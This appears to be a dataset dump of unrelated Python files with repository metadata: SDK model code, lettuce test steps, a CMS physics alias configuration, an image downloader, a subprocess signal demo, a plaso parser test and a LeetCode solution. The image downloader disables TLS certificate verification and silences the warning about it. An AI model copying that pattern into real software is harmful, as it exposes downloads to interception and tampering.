                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                if attr in self.sensitive_list:
                    result[attr] = "****"
                else:
                    result[attr] = value
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        # NOTE(review): requires the third-party simplejson package; the
        # reload/setdefaultencoding branch only matters on Python 2.
        import simplejson as json
        if six.PY2:
            import sys
            reload(sys)
            sys.setdefaultencoding("utf-8")
        return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
    def __repr__(self):
        """For `print`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, UpdatePlaybookActionRequest):
            return False
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
7cbb792e2cb7f0c7d51684f1e7fad31c4ff22284
|
23c944ff03ea82cb1b557780bbe9810a4f5e001c
|
/mymath/tests/features/increment-steps.py
|
61521a4c6f342460fe2a1e3af70507f51d283d1f
|
[] |
no_license
|
akshar-raaj/hack
|
711e13659530c0202879b815bf295efed661bb7d
|
4cab4d8ededd7adf8877b56741db2df7dabd0828
|
refs/heads/master
| 2020-04-04T00:33:29.900091
| 2015-09-05T12:05:13
| 2015-09-05T12:05:13
| 41,952,605
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 324
|
py
|
from lettuce import *
from fact import num, increment
@step('I have access to increment')
def access(step):
    """Lettuce step: no setup needed -- `increment` is imported above."""
    pass
@step('I use increment')
def use_increment(step):
    """Lettuce step: bump the module-level counter once."""
    increment()
@step(r'num is (\d+)')
def num_is(step, number):
    """Lettuce step: assert the counter equals the value captured from the
    scenario text.

    The pattern is now a raw string: the digit escape in a plain literal
    only works by accident and raises an invalid-escape warning on modern
    Pythons. The compiled regex is byte-identical.
    """
    number = int(number)
    assert num == number, "Expected %d, found %d" % (number, num)
|
[
"akshar@agiliq.com"
] |
akshar@agiliq.com
|
ae7c82de852c37f2276fa60c5a266cb353d7610c
|
afc8d5a9b1c2dd476ea59a7211b455732806fdfd
|
/Configurations/ggH/Full2016_nanoAOD/aliases.py
|
7e9a914cfb01546c67ef05e6dd9d77d585774d16
|
[] |
no_license
|
latinos/PlotsConfigurations
|
6d88a5ad828dde4a7f45c68765081ed182fcda21
|
02417839021e2112e740607b0fb78e09b58c930f
|
refs/heads/master
| 2023-08-18T20:39:31.954943
| 2023-08-18T09:23:34
| 2023-08-18T09:23:34
| 39,819,875
| 10
| 63
| null | 2023-08-10T14:08:04
| 2015-07-28T07:36:50
|
Python
|
UTF-8
|
Python
| false
| false
| 7,480
|
py
|
import os
import copy
import inspect
# Climb from this file's location up to the Configurations/ root; the path
# is used below to locate shared .cc macros compiled on the fly.
configurations = os.path.realpath(inspect.getfile(inspect.currentframe())) # this file
configurations = os.path.dirname(configurations) # ggH2016
configurations = os.path.dirname(configurations) # Differential
configurations = os.path.dirname(configurations) # Configurations
#aliases = {}
# imported from samples.py:
# samples, signals
# All simulated samples: everything except real data and data-driven fakes.
# `samples` is injected by the framework (imported from samples.py).
mc = [skey for skey in samples if skey not in ('Fake', 'DATA')]
# Lepton identification working points used throughout the aliases below.
eleWP = 'mva_90p_Iso2016'
muWP = 'cut_Tight80x'
aliases['LepWPCut'] = {
    'expr': 'LepCut2l__ele_'+eleWP+'__mu_'+muWP,
    'samples': mc + ['DATA']
}
aliases['gstarLow'] = {
'expr': 'Gen_ZGstar_mass >0 && Gen_ZGstar_mass < 4',
'samples': 'VgS'
}
aliases['gstarHigh'] = {
'expr': 'Gen_ZGstar_mass <0 || Gen_ZGstar_mass > 4',
'samples': 'VgS'
}
# Fake leptons transfer factor
aliases['fakeW'] = {
'expr': 'fakeW2l_ele_'+eleWP+'_mu_'+muWP,
'samples': ['Fake']
}
# And variations - already divided by central values in formulas !
aliases['fakeWEleUp'] = {
'expr': 'fakeW2l_ele_'+eleWP+'_mu_'+muWP+'_EleUp',
'samples': ['Fake']
}
aliases['fakeWEleDown'] = {
'expr': 'fakeW2l_ele_'+eleWP+'_mu_'+muWP+'_EleDown',
'samples': ['Fake']
}
aliases['fakeWMuUp'] = {
'expr': 'fakeW2l_ele_'+eleWP+'_mu_'+muWP+'_MuUp',
'samples': ['Fake']
}
aliases['fakeWMuDown'] = {
'expr': 'fakeW2l_ele_'+eleWP+'_mu_'+muWP+'_MuDown',
'samples': ['Fake']
}
aliases['fakeWStatEleUp'] = {
'expr': 'fakeW2l_ele_'+eleWP+'_mu_'+muWP+'_statEleUp',
'samples': ['Fake']
}
aliases['fakeWStatEleDown'] = {
'expr': 'fakeW2l_ele_'+eleWP+'_mu_'+muWP+'_statEleDown',
'samples': ['Fake']
}
aliases['fakeWStatMuUp'] = {
'expr': 'fakeW2l_ele_'+eleWP+'_mu_'+muWP+'_statMuUp',
'samples': ['Fake']
}
aliases['fakeWStatMuDown'] = {
'expr': 'fakeW2l_ele_'+eleWP+'_mu_'+muWP+'_statMuDown',
'samples': ['Fake']
}
# gen-matching to prompt only (GenLepMatch2l matches to *any* gen lepton)
aliases['PromptGenLepMatch2l'] = {
'expr': 'Alt$(Lepton_promptgenmatched[0]*Lepton_promptgenmatched[1], 0)',
'samples': mc
}
aliases['Top_pTrw'] = {
'expr': '(topGenPt * antitopGenPt > 0.) * (TMath::Sqrt(TMath::Exp(0.0615 - 0.0005 * topGenPt) * TMath::Exp(0.0615 - 0.0005 * antitopGenPt))) + (topGenPt * antitopGenPt <= 0.)',
'samples': ['top']
}
# Jet bins
# using Alt$(CleanJet_pt[n], 0) instead of Sum$(CleanJet_pt >= 30) because jet pt ordering is not strictly followed in JES-varied samples
# No jet with pt > 30 GeV
aliases['zeroJet'] = {
'expr': 'Alt$(CleanJet_pt[0], 0) < 30.'
}
aliases['oneJet'] = {
'expr': 'Alt$(CleanJet_pt[0], 0) > 30.'
}
aliases['multiJet'] = {
'expr': 'Alt$(CleanJet_pt[1], 0) > 30.'
}
# B tagging
aliases['bVeto'] = {
'expr': 'Sum$(CleanJet_pt > 20. && abs(CleanJet_eta) < 2.5 && Jet_btagDeepB[CleanJet_jetIdx] > 0.2217) == 0'
}
aliases['bReq'] = {
'expr': 'Sum$(CleanJet_pt > 30. && abs(CleanJet_eta) < 2.5 && Jet_btagDeepB[CleanJet_jetIdx] > 0.2217) >= 1'
}
# CR definitions
aliases['topcr'] = {
'expr': 'mtw2>30 && mll>50 && ((zeroJet && !bVeto) || bReq)'
}
aliases['dycr'] = {
'expr': 'mth<60 && mll>40 && mll<80 && bVeto'
}
aliases['wwcr'] = {
'expr': 'mth>60 && mtw2>30 && mll>100 && bVeto'
}
# SR definition
aliases['sr'] = {
'expr': 'mth>60 && mtw2>30 && bVeto'
}
# B tag scale factors
btagSFSource = '%s/src/PhysicsTools/NanoAODTools/data/btagSF/DeepCSV_2016LegacySF_V1.csv' % os.getenv('CMSSW_BASE')
aliases['Jet_btagSF_shapeFix'] = {
'linesToAdd': [
'gSystem->Load("libCondFormatsBTauObjects.so");',
'gSystem->Load("libCondToolsBTau.so");',
'gSystem->AddIncludePath("-I%s/src");' % os.getenv('CMSSW_RELEASE_BASE'),
'.L %s/patches/btagsfpatch.cc+' % configurations
],
'class': 'BtagSF',
'args': (btagSFSource,),
'samples': mc
}
aliases['bVetoSF'] = {
'expr': 'TMath::Exp(Sum$(TMath::Log((CleanJet_pt>20 && abs(CleanJet_eta)<2.5)*Jet_btagSF_shapeFix[CleanJet_jetIdx]+1*(CleanJet_pt<20 || abs(CleanJet_eta)>2.5))))',
'samples': mc
}
aliases['bReqSF'] = {
'expr': 'TMath::Exp(Sum$(TMath::Log((CleanJet_pt>30 && abs(CleanJet_eta)<2.5)*Jet_btagSF_shapeFix[CleanJet_jetIdx]+1*(CleanJet_pt<30 || abs(CleanJet_eta)>2.5))))',
'samples': mc
}
aliases['btagSF'] = {
'expr': '(bVeto || (topcr && zeroJet))*bVetoSF + (topcr && !zeroJet)*bReqSF',
'samples': mc
}
# Build up/down b-tag SF shape variations for each systematic source, plus
# the corresponding per-region (veto/req) and combined event weights.
for shift in ['jes','lf','hf','lfstats1','lfstats2','hfstats1','hfstats2','cferr1','cferr2']:
    aliases['Jet_btagSF_shapeFix_up_%s' % shift] = {
        'class': 'BtagSF',
        'args': (btagSFSource, 'up_' + shift),
        'samples': mc
    }
    aliases['Jet_btagSF_shapeFix_down_%s' % shift] = {
        'class': 'BtagSF',
        'args': (btagSFSource, 'down_' + shift),
        'samples': mc
    }
    # Derive the shifted bVetoSF/bReqSF expressions from the nominal ones by
    # swapping in the varied per-jet SF branch name.
    for targ in ['bVeto', 'bReq']:
        alias = aliases['%sSF%sup' % (targ, shift)] = copy.deepcopy(aliases['%sSF' % targ])
        alias['expr'] = alias['expr'].replace('btagSF_shapeFix', 'btagSF_shapeFix_up_%s' % shift)
        alias = aliases['%sSF%sdown' % (targ, shift)] = copy.deepcopy(aliases['%sSF' % targ])
        alias['expr'] = alias['expr'].replace('btagSF_shapeFix', 'btagSF_shapeFix_down_%s' % shift)
    aliases['btagSF%sup' % shift] = {
        'expr': aliases['btagSF']['expr'].replace('SF', 'SF' + shift + 'up'),
        'samples': mc
    }
    aliases['btagSF%sdown' % shift] = {
        'expr': aliases['btagSF']['expr'].replace('SF', 'SF' + shift + 'down'),
        'samples': mc
    }
# data/MC scale factors
aliases['SFweight'] = {
'expr': ' * '.join(['SFweight2l', 'LepSF2l__ele_' + eleWP + '__mu_' + muWP, 'LepWPCut', 'btagSF', 'PrefireWeight']),
'samples': mc
}
# variations
aliases['SFweightEleUp'] = {
'expr': 'LepSF2l__ele_'+eleWP+'__Up',
'samples': mc
}
aliases['SFweightEleDown'] = {
'expr': 'LepSF2l__ele_'+eleWP+'__Do',
'samples': mc
}
aliases['SFweightMuUp'] = {
'expr': 'LepSF2l__mu_'+muWP+'__Up',
'samples': mc
}
aliases['SFweightMuDown'] = {
'expr': 'LepSF2l__mu_'+muWP+'__Do',
'samples': mc
}
aliases['nllWOTF'] = {
'linesToAdd': ['.L %s/Differential/nllW.cc+' % configurations],
'class': 'WWNLLW',
'args': ('central',),
'samples': ['WW']
}
# In WpWmJJ_EWK events, partons [0] and [1] are always the decay products of the first W
aliases['lhe_mW1'] = {
'expr': 'TMath::Sqrt(2. * LHEPart_pt[0] * LHEPart_pt[1] * (TMath::CosH(LHEPart_eta[0] - LHEPart_eta[1]) - TMath::Cos(LHEPart_phi[0] - LHEPart_phi[1])))',
'samples': ['WWewk']
}
# and [2] [3] are the second W
aliases['lhe_mW2'] = {
'expr': 'TMath::Sqrt(2. * LHEPart_pt[2] * LHEPart_pt[3] * (TMath::CosH(LHEPart_eta[2] - LHEPart_eta[3]) - TMath::Cos(LHEPart_phi[2] - LHEPart_phi[3])))',
'samples': ['WWewk']
}
# use HTXS_njets30 when moving to NanoAODv5 for all trees
aliases['nCleanGenJet'] = {
'linesToAdd': ['.L %s/Differential/ngenjet.cc+' % configurations],
'class': 'CountGenJet',
'samples': signals
}
# GGHUncertaintyProducer wasn't run for 2016 nAODv5 non-private
thus = [
'ggH_mu',
'ggH_res',
'ggH_mig01',
'ggH_mig12',
'ggH_VBF2j',
'ggH_VBF3j',
'ggH_pT60',
'ggH_pT120',
'ggH_qmtop'
]
for thu in thus:
aliases[thu] = {
'linesToAdd': ['.L %s/Differential/gghuncertainty.cc+' % configurations],
'class': 'GGHUncertainty',
'args': (thu,),
'samples': ['ggH_hww'],
'nominalOnly': True
}
|
[
"lorenzo.viliani@cern.ch"
] |
lorenzo.viliani@cern.ch
|
adff771b2088a82c77b2f650a290c0117b99034f
|
5eb29ce7104e10a399d9afd7e253f029bf8bc0ff
|
/cu_image_search/memex_tools/image_dl.py
|
dd8e2583167f9141fbc46ae7257f0a4980fbc490
|
[
"BSD-2-Clause"
] |
permissive
|
svebk/DeepSentiBank_memex
|
69789dc09316e97aad711edeb251837a60184e7e
|
4e69ce66e3a177817ff360ddc263f55c6e0b63f7
|
refs/heads/master
| 2021-01-18T18:55:10.870052
| 2017-10-19T22:51:29
| 2017-10-19T22:51:29
| 36,091,024
| 22
| 1
| null | 2017-02-09T20:31:20
| 2015-05-22T19:20:54
|
Python
|
UTF-8
|
Python
| false
| false
| 4,721
|
py
|
import os
import requests
import shutil
import time
import warnings
import numpy as np
imagedltimeout = 3
session = requests.Session()
session.trust_env = False
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def mkpath(outpath):
pos_slash=[pos for pos,c in enumerate(outpath) if c=="/"]
for pos in pos_slash:
try:
os.mkdir(outpath[:pos])
except:
pass
def dlimage_basepath(url,basepath,logf=None):
start_time = time.time()
if not url:
return None
pos_slash=[pos for pos,c in enumerate(url) if c=="/"]
#pos_point=[pos for pos,c in enumerate(url) if c=="."]
if not pos_slash:
return None
file_img=url[pos_slash[-1]+1:]
# path with time and random to ensure unique names
outpath=os.path.join(basepath,str(time.time())+'_'+str(np.int32(np.random.random()*(10e6)))+'_'+file_img)
mkpath(outpath)
uptomkpath_time = time.time()
#print "Downloading image from {} to {}.".format(url,outpath)
try:
#r = requests.get(url, stream=True, timeout=imagedltimeout)
# still slow with session.trust_env
# verify=False induces a InsecureRequestWarning
r = session.get(url, stream=True, timeout=imagedltimeout, verify=False)
uptorequest_time = time.time()
if r.status_code == 200:
with open(outpath, 'wb') as f:
r.raw.decode_content = True
shutil.copyfileobj(r.raw, f)
uptowrite_time = time.time()
mkpath_time = uptomkpath_time - start_time
dl_time = uptorequest_time - uptomkpath_time
write_time = uptowrite_time - uptorequest_time
print("[dlimage_basepath] mkpath_time {}, dl_time {}, write_time {}".format(mkpath_time, dl_time, write_time))
return outpath
except Exception as inst:
if logf:
logf.write("Download failed for img that should be saved at {} from url {}.\n".format(outpath,url))
else:
print "Download failed for img that should be saved at {} from url {}.".format(outpath,url)
print inst
return None
def dlimage_basepath_integritycheck(url, basepath, logf=None):
import subprocess as sub
if not url:
return None
pos_slash = [pos for pos,c in enumerate(url) if c=="/"]
if not pos_slash:
return None
file_img = url[pos_slash[-1]+1:]
# path with time and random to ensure unique names
outpath = os.path.join(basepath,str(time.time())+'_'+str(np.int32(np.random.random()*(10e6)))+'_'+file_img)
mkpath(outpath)
#print "Downloading image from {} to {}.".format(url,outpath)
try:
#r = requests.get(url, stream=True, timeout=imagedltimeout)
# verify=False induces a InsecureRequestWarning
r = session.get(url, stream=True, timeout=imagedltimeout, verify=False)
if r.status_code == 200:
if int(r.headers['content-length']) == 0:
raise ValueError("Empty image.")
with open(outpath, 'wb') as f:
r.raw.decode_content = True
shutil.copyfileobj(r.raw, f)
# integrity check here
ok_tag = '[OK]'
error_tag = '[ERROR]'
command = 'jpeginfo -c '+ outpath
output, error = sub.Popen(command.split(' '), stdout=sub.PIPE, stderr=sub.PIPE).communicate()
if output.find(ok_tag)<0 or output.find(error_tag)>=0:
# some images are not JPEG, either PNG or even HTML...
raise ValueError("Integrity check failed, output was: {}".format(output.strip()))
return outpath
except Exception as inst:
if logf:
logf.write("[dlimage_basepath_integritycheck: error] Download failed for img that should be saved at {} from url {}. {}\n".format(outpath, url, inst))
else:
print "[dlimage_basepath_integritycheck: error] Download failed for img that should be saved at {} from url {}. {}".format(outpath, url, inst)
return None
def dlimage(url,logf=None):
return dlimage_basepath(url,'./',logf)
def dlimage_args(args):
if len(args)==2:
#print args[0],args[1]
return dlimage_basepath(args[0],args[1])
else:
print "[dl_image_args: warning] incorrect agruments: {}.".format(args)
return None
def dlimage_args_integritycheck(args):
if len(args)==2:
#print args[0],args[1]
return dlimage_basepath_integritycheck(args[0], args[1])
else:
print "[dl_image_args_integritycheck: warning] incorrect agruments: {}.".format(args)
return None
|
[
"svebor.karaman@gmail.com"
] |
svebor.karaman@gmail.com
|
5d7ac2ba25b18ff4484f8328d3f21f2d5fe93401
|
810ce1c1ac47743e253171ec7541c0e431d952c2
|
/standard_library/Concurrency/Subprocess/subprocess_signal_parent_shell.py
|
f65410bbf08ac27c3089d736b913256dd8f8f41d
|
[] |
no_license
|
hjlarry/practise-py
|
91052c25dc7ab706c6234f6d657db76667a27124
|
871e06b9652d356f55e3888f1f7ea180ac2b1954
|
refs/heads/master
| 2022-09-11T17:47:48.557194
| 2022-08-10T02:07:24
| 2022-08-10T02:07:24
| 136,263,989
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,047
|
py
|
"""
用于发送信号的 pid 与等待信号的运行 shell 脚本的子进程 id 不同,因为这个例子中有三个独立的进程在交互:
1. 主程序 subprocess_signal_parent_shell.py
2. 主程序创建的运行脚本的 shell 进程。
3. 程序signal_child.py
如果由 Popen 创建的进程产生子进程,那么子进程将不会收到任何发送给父进程的任何信号。
"""
import os
import signal
import subprocess
import tempfile
import time
import sys
print("由于父进程创建的子进程是shell,shell再创建的进程才是signal_child,signal_child无法收到信号")
script = """#!/bin/sh
echo "Shell script in process $$"
set -x
python3 signal_child.py
"""
script_file = tempfile.NamedTemporaryFile("wt")
script_file.write(script)
script_file.flush()
proc = subprocess.Popen(["sh", script_file.name])
print(f"Parent: Pausing before signal {proc.pid}")
sys.stdout.flush()
time.sleep(1)
print(f"Parent: Signaling child {proc.pid}")
sys.stdout.flush()
os.kill(proc.pid, signal.SIGUSR1)
time.sleep(3)
|
[
"hjlarry@163.com"
] |
hjlarry@163.com
|
e27f776e66186c3805e38f5fe1037c380b83a772
|
97f2f0d821ce8d12b6d03f200692721418458e4b
|
/ths/test/testsentimentensemble.py
|
828bd399e2ea80bf67545e102de46b91a1a2fe46
|
[] |
no_license
|
manuelr417/DetectDiseaseTHS
|
0851f3c2fe5caa460eacfe1fc57c790fcd43fd0a
|
43ae6482a4e3009fcf0899d0a1047590c4c77f7f
|
refs/heads/master
| 2021-04-15T08:23:43.430178
| 2020-04-13T11:46:34
| 2020-04-13T11:46:34
| 126,485,918
| 0
| 3
| null | 2018-10-17T13:32:44
| 2018-03-23T13:01:29
|
Python
|
UTF-8
|
Python
| false
| false
| 488
|
py
|
from ths.nn.sequences.processemsemble import ProcessTweetsWord2VecOnePassEnsemble
def main():
print("Working:")
#P = ProcessTweetsWord2VecOnePass2DCNNv2_1("data/cleantextlabels3.csv", "trained/embedding3.csv")
P = ProcessTweetsWord2VecOnePassEnsemble("data/cleantextlabels3.csv", "data/glove.6B.50d.txt")
#Bueno el model12cnnv2
P.process("trained/modelensemble6.json", "trained/modelensemble6.h5", plot=True, epochs=20)
#joderme
if __name__ == "__main__":
main()
|
[
"manuel.rodriguez7@upr.edu"
] |
manuel.rodriguez7@upr.edu
|
64e423abf7ebbca4e0426ebdce632030f0eb92f9
|
ae87b11560c543cb678c52a28916ea2252d7aa52
|
/tests/parsers/mac_appfirewall.py
|
af22d404ed067295db1745d695a435ad49dfadcc
|
[
"Apache-2.0"
] |
permissive
|
CNR-ITTIG/plasodfaxp
|
19ccf77d0be62cfa8a9b246eb6797cf64a480d80
|
923797fc00664fa9e3277781b0334d6eed5664fd
|
refs/heads/master
| 2016-09-13T11:14:08.877399
| 2016-04-11T15:01:42
| 2016-04-11T15:01:42
| 55,975,921
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,765
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for Mac AppFirewall log file parser."""
import unittest
# pylint: disable=unused-import
from plaso.formatters import mac_appfirewall as mac_appfirewall_formatter
from plaso.lib import timelib
from plaso.parsers import mac_appfirewall
from tests.parsers import test_lib
class MacAppFirewallUnitTest(test_lib.ParserTestCase):
"""Tests for Mac AppFirewall log file parser."""
def setUp(self):
"""Makes preparations before running an individual test."""
self._parser = mac_appfirewall.MacAppFirewallParser()
def testParseFile(self):
"""Test parsing of a Mac Wifi log file."""
knowledge_base_values = {u'year': 2013}
test_file = self._GetTestFilePath([u'appfirewall.log'])
event_queue_consumer = self._ParseFile(
self._parser, test_file, knowledge_base_values=knowledge_base_values)
event_objects = self._GetEventObjectsFromQueue(event_queue_consumer)
self.assertEqual(len(event_objects), 47)
event_object = event_objects[0]
expected_timestamp = timelib.Timestamp.CopyFromString(
u'2013-11-02 04:07:35')
self.assertEqual(event_object.timestamp, expected_timestamp)
self.assertEqual(event_object.agent, u'socketfilterfw[112]')
self.assertEqual(event_object.computer_name, u'DarkTemplar-2.local')
self.assertEqual(event_object.status, u'Error')
self.assertEqual(event_object.process_name, u'Logging')
self.assertEqual(event_object.action, u'creating /var/log/appfirewall.log')
expected_msg = (
u'Computer: DarkTemplar-2.local '
u'Agent: socketfilterfw[112] '
u'Status: Error '
u'Process name: Logging '
u'Log: creating /var/log/appfirewall.log')
expected_msg_short = (
u'Process name: Logging '
u'Status: Error')
self._TestGetMessageStrings(event_object, expected_msg, expected_msg_short)
event_object = event_objects[9]
expected_timestamp = timelib.Timestamp.CopyFromString(
u'2013-11-03 13:25:15')
self.assertEqual(event_object.timestamp, expected_timestamp)
self.assertEqual(event_object.agent, u'socketfilterfw[87]')
self.assertEqual(event_object.computer_name, u'DarkTemplar-2.local')
self.assertEqual(event_object.status, u'Info')
self.assertEqual(event_object.process_name, u'Dropbox')
self.assertEqual(event_object.action, u'Allow TCP LISTEN (in:0 out:1)')
expected_msg = (
u'Computer: DarkTemplar-2.local '
u'Agent: socketfilterfw[87] '
u'Status: Info '
u'Process name: Dropbox '
u'Log: Allow TCP LISTEN (in:0 out:1)')
expected_msg_short = (
u'Process name: Dropbox '
u'Status: Info')
self._TestGetMessageStrings(event_object, expected_msg, expected_msg_short)
# Check repeated lines.
event_object = event_objects[38]
repeated_event_object = event_objects[39]
self.assertEqual(event_object.agent, repeated_event_object.agent)
self.assertEqual(
event_object.computer_name, repeated_event_object.computer_name)
self.assertEqual(event_object.status, repeated_event_object.status)
self.assertEqual(
event_object.process_name, repeated_event_object.process_name)
self.assertEqual(event_object.action, repeated_event_object.action)
# Year changes.
event_object = event_objects[45]
expected_timestamp = timelib.Timestamp.CopyFromString(
u'2013-12-31 23:59:23')
self.assertEqual(event_object.timestamp, expected_timestamp)
event_object = event_objects[46]
expected_timestamp = timelib.Timestamp.CopyFromString(
u'2014-01-01 01:13:23')
self.assertEqual(event_object.timestamp, expected_timestamp)
if __name__ == '__main__':
unittest.main()
|
[
"dfirfpi@gmail.com"
] |
dfirfpi@gmail.com
|
f0148135b7890c0e3aa022d70d08522b3a367bec
|
c49a6e67a63a541f8d420e725af155505d1e7f84
|
/Tree/unique-binary-search-trees-ii.py
|
edd7063cc4f05e9ecfc78755a5d57aa38199fcdf
|
[] |
no_license
|
wttttt-wang/leetcode_withTopics
|
b41ed0f8a036fd00f3b457e5b56efe32f872ca13
|
e2837f3d6c23f012148a2d1f9d0ef6d34d4e6912
|
refs/heads/master
| 2021-09-05T05:03:47.519344
| 2018-01-24T08:28:58
| 2018-01-24T08:28:58
| 112,893,345
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 688
|
py
|
"""
Unique Binary Search Trees II
@ Tree + Recursion
"""
class Solution(object):
def generateTrees(self, n):
"""
:type n: int
:rtype: List[TreeNode]
"""
if n < 1:
return []
return self.helper(1, n)
def helper(self, start, end):
if start > end:
return [None]
results = []
for i in range(start, end + 1):
ls, rs = self.helper(start, i - 1), self.helper(i + 1, end)
for l in ls:
for r in rs:
root = TreeNode(i)
root.left, root.right = l, r
results.append(root)
return results
|
[
"wttttt@Wttttt-de-MacBookPro.local"
] |
wttttt@Wttttt-de-MacBookPro.local
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.